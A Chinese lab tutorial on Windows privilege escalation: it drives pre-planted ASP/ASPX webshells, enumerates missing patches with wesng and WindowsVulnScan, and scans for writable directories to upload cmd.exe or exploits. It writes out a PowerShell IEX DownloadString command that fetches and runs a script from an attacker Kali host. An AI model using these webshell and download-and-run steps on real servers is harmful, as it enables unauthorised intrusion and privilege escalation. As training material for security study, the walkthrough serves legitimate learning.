Windows提权之基本流程(二)
首先我们
安装环境
首先 在百度网盘上下载好是这样的
通过网盘分享的文件:08serverR2-1.zip
链接: 百度网盘 请输入提取码 提取码: 7hyh
--来自百度网盘超级会员v3的分享
我们在虚拟机里边打开
点击打开虚拟机
然后选中.vmx结尾的 双击打开
然后点击获取所有权
点击继续运行 虚拟机
点击 我已经复制虚拟机
点击放弃
点击确定
然后点击开启虚拟机
摁下回车 快速启动
摁下这个按钮
点击 administrator 输入密码 123456
点击确定
然后我们打开 这个目录下的
我们这里有 sb.asp 还有sb.aspx 这个是我们的后门
下边是
提权的流程
能够执行cmd命令->是否打补丁->补丁对应exp->获取服务器权限 执行命令的时候 aspx->php和asp
如果管理员删除服务器组件 wscript.shell无法在asp执行cmd命令 这个时候可以使用aspx的后门查看是否有权限执行cmd命令
如果是校园网的同学们
我们记得把桥接模式修改为nat模式 因为校园网不能进行桥接
然后我们输入
ipconfig 来查询ip 192.168.25.139
然后我们再我们的本机上输入
192.168.25.139
然后我们访问 .asp文件
http://192.168.25.139/sb.asp
输入密码 123456
我们进入
是这个鬼样子 因为这个网页在我们现在的这个浏览器版本里边 已经好多不兼容了
所以我们在 这个目标主机 里边自带的低版本的浏览器里进行访问
还是一样的
http://192.168.25.139/sb.asp
输入密码 123456
我们进入 在这个浏览器里边已经很正常了
我们点击
发现存在
wscript.shell 命令行执行组件,显示
我们就可以执行cmd命令了
点击
然后我们再点击执行
我么执行
whoami
我们也可以查看详细信息
whoami /all
如果我们不能执行cmd的话
我们可以上传到别处的cmd.exe问文件
然后修改对应的路径即可
然后我们来看看sb.aspx文件
输入
http://192.168.25.139/sb.aspx
然后密码是 admin
我们进入
我们点击
然后再点击
我们还是可以执行cmd的
我们执行 whoami /all
我们发现都i是iss的权限 这个权限是最低的
所以我们就要进行提权
然后我们打开在线补丁验证平台
潮影在线免杀平台
我们输入systeminfo
我们复制到输入框里
我们点击获取exp
还有我们发现了
第一个网站这里 命令行 没有/c
第二个网站这里 命令这里有/c
那麽这是镇魔意思呢
就是 我们查看源代码 发现第一个网站这里 后台源码 已经帮助你加上了/c
而第二个网站这里后台没有帮你加上/c 所以显示在了 前台
也就是说 我们输入指令 前边都加上了 /c
那摩 /c 是啥意思呢 为啥要加这个呢
我们可以看下边这几篇文章
https://jingyan.baidu.com/article/cd4c2979266c30756e6e6091.html
cmd /c和cmd /k-CSDN博客
我这里也给你们解释一下
/c 就是 执行字符串指定的命令然后终止
我们输入 cmd systeminfo
然后我们输入
cmd /c systeminfo
然后等待中
首先我们先把systeminfo 的信息文件都导入一个文件里
我们输入
systeminfo > C:\ProgramData\1.txt
然后我们在我们自己本机上的浏览器输入
http://192.168.25.139/sb.aspx#
点击下载
选择 保存
下载到我们本机上
然后我们下载我们的
查询补丁工具wesng
GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation
下载好之后我们解压缩
然后我们把1.txt文件放入
然后我们输入cmd
首先这个要是python3版本的
其次我们要查询语法
我们要先更新
我们要输入
python wes.py --update-wes
其次我们
然后我们要查询exp
python wes.py 1.txt
在最后我们发现 有207有可能能利用的exp
然后我们来看下一款工具
WindowsVulnScan 查询补丁
下载地址
GitHub - chroblert/WindowsVulnScan
windows-exp-suggester
这款和本工具的原理一样,尝试使用了之后,发现它的CVEKB数据库只更新到2017年的,并且没有给出
CVE是否有公开的EXP信息。
工具的原理是
1. 搜集CVE与KB的对应关系。首先在微软官网上收集CVE与KB对应的关系,然后存储进数据库中
2. 查找特定CVE网上是否有公开的EXP
3. 利用powershell脚本收集主机的一些系统版本与KB信息
4. 利用系统版本与KB信息搜寻主机上具有存在公开EXP的CVE
参数说明
# author: JC0o0l
# GitHub: https://github.com/chroblert/
可选参数:
-h, --help show this help message and exit
-u, --update-cve 更新CVEKB数据
-U, --update-exp 更新CVEEXP数据
-m MODE, --mode MODE 搭配-U使用。更新模式 All:更新所有;Empty:只更新空白的;Error:只更
新之前未成功更新的
-C, --check-EXP 检索具有EXP的CVE
-n PRODUCTNAME, --productName PRODUCTNAME
搭配-C使用。自定义产品名称,如Windows 10
-N PRODUCTVERSION, --productVersion PRODUCTVERSION
搭配-C使用。自定义产品版本,如20H2
-f FILE, --file FILE ps1脚本运行后产生的.json文件
首先我们先下载下来
解压缩
我们进入目录
有两个版本
我们进入下一个 因为下一个是最新的
然后我们现在对他进行修改
我们修改上传目录
C:\ProgramData\
然后保存
然后我们打开我们的kail机
我们把这个修改过的文件 复制到kail机的桌面上
然后我们在桌面开启80d端口服务
然后新建窗口
查询ifconfig 192.168.25.138
Powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.25.138/KBCollect.ps1')
然后我们在本机执行cmd
然后我们点击生成
然后我们找到 KB.json文件
我们点击编辑他
发现里边不是我们想要的内容(这里我为什莫我知道不是我们想要的内容呢 是因为 我做过 所以我知道 嘿嘿)
然后我们修改后缀
继续在执行cmd
这下我们加了些引号
"Powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.25.138/KBCollect.ps1')"
看看行不行
然后我们继续点击该文件 发现还是不行
所以我们现在 换一台主机
还是老样子 我们在百度网盘上下载好 还是同样的步骤 我们下载解压缩 然后用虚拟机打开(这里跟打开上一个主机的步骤是一样的 这里我便不再多说)
通过网盘分享的文件:12server7.zip.002等2个文件
链接: 百度网盘 请输入提取码 提取码: dyh8
--来自百度网盘超级会员v3的分享
我们打开虚拟机
首先打开cmd窗口 我们来查询ip
ipconfig
192.168.25.140
同理 我在我们本机上输入 然后输入密码admin
http://192.168.25.140/sb.aspx
首先我们查看
C:\Windows\Temp\
我们把后缀修改为.json1
然后我们打开cmdshell
然后其他环境不变 kail上打开了80端口服务
我们继续输入
"Powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.25.138/KBCollect.ps1')"
然后就会出现这个
然后这里的报错不用管
然后这里就有我们写入的
然后我们打开编辑 然后这个就是我们正确的样子
然后我们点击下载 到我们的本机上
然后我们把该文件 替换到该目录下
我们顺势打开cmd
我们输入
python cve-check.py -C -f KB.json
然后我们等待exp 生成
然后我们就可以利用了
然后
查询可写目录或者文件
在确定可以执行cmd命令时,有些服务器会对目录进行权限设置,导致iis_user用户组没有权限对常见的目录进行写入和读取,这时可以用扫描可写目录脚本对目录进行遍历扫描,得到可写目录 上传或下载 提权exp 或替换文件 进行利用。
常见的脚本有wt.asp 红色表示文件可替换 蓝色表示目录可写
我们打开我们刚才下载的虚拟机
里边就有这两个文件
我们在我们的本机上输入
http://192.168.25.140/wt.aspx
然后我们等待片刻 这里我只列举了一部分分
然后我们在浏览上输入另外一个文件
http://192.168.25.140/wt.asp
然后我们点击开始检测
然后我们等待中
代表的意思是 文件可以进行改写 目录我们可以进行写入
然后我们可以都试试
c:\windows\debug\WIA\
这个目录里边的cmd.exe 是我们之前上传的 我们现在进行删除
我们上传一个新的cmd.exe 上传桌面上的这个
上传成功 我们重新进入 cmd shell
修改cmd的路径
c:\windows\debug\WIA\cmd.exe
我们点击执行命令
发现是可以执行的
这个是进入
http://192.168.25.139/sb.asp
接下来然后我们进入另一个文件
http://192.168.25.139/sb.aspx
同样我们也修改cmd 的路径
这是修改之前的
这是修改之后的
发现我们还是可以执行的
同时 我们不仅可以上传cmd文件 我们还可以上传一些exp 来获得更高的权限